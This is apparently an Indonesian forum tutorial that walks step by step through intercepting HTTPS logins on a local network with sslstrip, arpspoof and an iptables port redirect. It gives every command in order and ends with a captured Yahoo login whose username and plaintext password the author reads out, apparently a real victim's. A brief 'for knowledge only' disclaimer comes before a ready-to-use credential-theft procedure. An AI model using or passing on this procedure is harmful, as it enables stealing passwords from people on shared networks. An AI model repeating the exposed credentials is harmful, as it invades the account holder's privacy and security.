[zee eichel]

setelah ane membahas tentang bagaimana menaklukan https dengan ettercap.. agaknya ane harus membahas bagaimana menghantam https dengan sslstrip... ok langsung aja deh ...

caution : semua tutorial ini hanyalah untuk pengetahuan semata... segala tindak kejahatan atau penyalahgunaan dari tutorial ini bukan tanggung jawab saya ....

informasi target ..

ip address ane : 192.168.1.34
ip address target : 192.168.1.2
ip gateway : 192.168.1.1

options sesion ...

Code:

zee-laptop@IBTeam:~$ sslstrip --help

sslstrip 0.6 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

note :
-opsi -a digunakan untuk logging semua trafic ( http,https)
-opsi -s digunakan untuk logging traficc ssl saja
-opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 )
-opsi : -w : tempat file dump akan disimpan.

ok ... to the point ..

Code:

zee-laptop@IBTeam:~$ sslstrip -a -w passwd

sslstrip 0.6 by Moxie Marlinspike running...

sekarang jalankan arp ..

Code:

zee-laptop@IBTeam:~$ arpspoof -i eth0 -t 192.168.1.2 192.168.1.1

dengan keterangan syntax..
opsi -i ( interface )
opsi -t ip address secara spesifik ( target ) ( gateway )

klo bt ente lom ada arpspoof .. install dolo dsniff

Code:

zee-laptop@IBTeam:~$ sudo apt-get install dsniff

langkah berikutnya kita aktifkan ip forward ..

Spoiler! :

Code:

zee-laptop@IBTeam:~$ su root
root@IBTeam:/home/zee-laptop# echo 1 > /proc/sys/net/ipv4/ip_forward

redirect port victim ( 80 ) ke port sslstrip (10000)

Spoiler! :

Code:

root@IBTeam:/home/zee-laptop# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

nanti tinggal buka jaring untuk liat hasil tangkapan ..

Spoiler! :

Code:

root@IBTeam:/home/zee-laptop# cat ssl | grep -i "passwd="

url+="?";if(valid_js()){var passwd=form.passwd.value;var challen
function hash2(form){var passwd=form.passwd.value
2011-03-26 22:12:10,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=nitharamadhan&passwd=imutkucintaku&.save=Sign+In

hmm berarti user = nitharamadhan ...
pass = imutkucintaku

sorry no ss coz koneksi ane cuma pake telkomflash paling murah,.. upload makan quota... thx....